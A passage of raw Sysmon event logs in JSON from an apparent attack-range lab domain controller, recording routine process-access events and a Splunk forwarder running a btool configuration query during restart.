06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3405,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3406,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-0010E86C0500}\r\nTargetProcessId: 3028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-0010E86C0500}","TargetProcessId":"3028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.149\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-0010A76F0500}\r\nProcessId: 2552\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nParentProcessId: 4864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.149","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010A76F0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","ParentProcessId":"4864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
